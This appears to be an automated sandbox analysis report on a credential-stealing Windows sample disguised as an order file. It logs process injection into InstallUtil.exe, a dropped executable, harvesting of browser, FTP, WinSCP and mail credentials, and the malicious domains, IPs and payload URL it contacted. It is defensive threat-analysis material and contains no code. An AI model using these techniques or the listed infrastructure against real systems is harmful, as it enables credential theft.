                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C42008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10B4008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1016008Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Users\user\AppData\Roaming\Fqhnalw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Users\user\AppData\Roaming\Fqhnalw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8048, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8048, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7872, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8048, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 21 Obfuscated Files or Information | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 12 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1529933, Sample: GEFA-Order 232343-68983689.exe, Startdate: 09/10/2024, Architecture: WINDOWS, Score: 100

• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
• DNS/IP: ftp.alternatifplastik.com; rubberpartsmanufacturers.com
• GEFA-Order 232343-68983689.exe (started)
    • DNS/IP: rubberpartsmanufacturers.com, 103.191.208.122, 443, 49727, 49818, AARNET-AS-APAustralianAcademicandResearchNetworkAARNe, unknown
    • Dropped: C:\Users\user\AppData\Roaming\Fqhnalw.exe, PE32
    • Dropped: C:\Users\user\...\Fqhnalw.exe:Zone.Identifier, ASCII
    • Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
    • InstallUtil.exe (started)
        • DNS/IP: ftp.alternatifplastik.com, 5.2.84.236, 21, 49766, 49775, ALASTYRTR, Turkey
        • Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
• Fqhnalw.exe (started)
    • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • InstallUtil.exe (started)
• Fqhnalw.exe (started)
    • InstallUtil.exe (started)
        • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label | Link
GEFA-Order 232343-68983689.exe | 21% | ReversingLabs | |
GEFA-Order 232343-68983689.exe | 100% | Avira | HEUR/AGEN.1309900 |
GEFA-Order 232343-68983689.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Fqhnalw.exe | 100% | Avira | HEUR/AGEN.1309900 |
C:\Users\user\AppData\Roaming\Fqhnalw.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Fqhnalw.exe | 32% | ReversingLabs | Win32.Trojan.Generic |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0044.t-0009.fb-t-msedge.net | 13.107.253.72 | true | false | | unknown
ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown
rubberpartsmanufacturers.com | 103.191.208.122 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://rubberpartsmanufacturers.com/manxz/Pqbrsrcnsx.mp4 | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/mgravell/protobuf-net | GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/mgravell/protobuf-neti | GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/14436606/23354 | GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-netJ | GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
